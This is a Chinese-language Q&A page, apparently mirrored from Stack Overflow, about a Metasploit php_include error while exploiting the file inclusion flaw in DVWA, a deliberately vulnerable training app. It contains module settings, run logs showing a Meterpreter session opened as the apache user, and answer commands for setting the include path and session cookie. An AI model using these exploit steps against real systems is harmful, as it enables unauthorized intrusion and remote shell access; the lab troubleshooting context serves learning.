【问题标题】:Metasploit php_include 'undefined method `remove_resource' for nil:NilClass'Metasploit php_include 'undefined method `remove_resource' for nil:NilClass'
【发布时间】:2014-06-28 18:24:40
【问题描述】:

我正在尝试利用 dvwa 文件包含漏洞。 我指的是这个教程: http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter

当我运行“exploit”时,我收到以下错误: [-] 利用失败:nil:NilClass 的未定义方法 `remove_resource'

我设置的选项:

msf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

   Name      Current Setting                                                           Required  Description
   ----      ---------------                                                           --------  -----------
   HEADERS                                                                             no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   PATH      /                                                                         yes       The base directory to prepend to the URL to try
   PHPRFIDB  /home/david/msf/metasploit-framework/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /dvwa/vulnerabilities/fi/?page=XXpathXX                                   no        The URI to request, with the include parameter changed to XXpathXX
   POSTDATA                                                                            no        The POST data to send, with the include parameter changed to XXpathXX
   Proxies                                                                             no        Use a proxy chain
   RHOST     172.16.246.131                                                            yes       The target address
   RPORT     80                                                                        yes       The target port
   SRVHOST   0.0.0.0                                                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080                                                                      yes       The local port to listen on.
   SSLCert                                                                             no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                                                             no        The URI to use for this exploit (default is random)
   VHOST                                                                               no        HTTP server virtual host


Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.246.131   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(php_include) > run

[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ORFRTphN
[*]  Local IP: http://10.8.0.10:8080/ORFRTphN
[*] PHP include server started.
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

感谢您的帮助!

【问题讨论】:

  • 你让它工作了吗?需要在我的答案中添加任何内容吗?

标签: php exploit metasploit


【解决方案1】:

漏洞利用成功时似乎也会出现此错误:

msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.1.2:443 
[*] Using URL: http://192.168.1.2:80/521eNu
[*] PHP include server started.
[*] Sending stage (39848 bytes) to 192.168.1.208
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.208:32887) at 2014-06-01 20:44:15 +0100
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

meterpreter > getuid
Server username: apache (48)

确保PATHPHPURI 设置设置正确。您可能需要它们如下:

set PATH /dvwa/vulnerabilities/fi
set PHPURI /?page=XXpathXX

通过 Wireshark 检查 URL 是否按预期发送。

另外,也有可能是某些出站端口被阻塞了,所以请尝试不同的值。

在 DVWA 的特定情况下,您需要使用 HEADERS 参数传递会话 cookie。从您登录的浏览器会话中获取此信息,然后进行如下设置:

set HEADERS cookie=PHPSESSIONID=....

【讨论】:

    猜你喜欢
    • 1970-01-01
    • 2013-08-31
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 2015-03-19
    • 2016-08-13
    相关资源
    最近更新 更多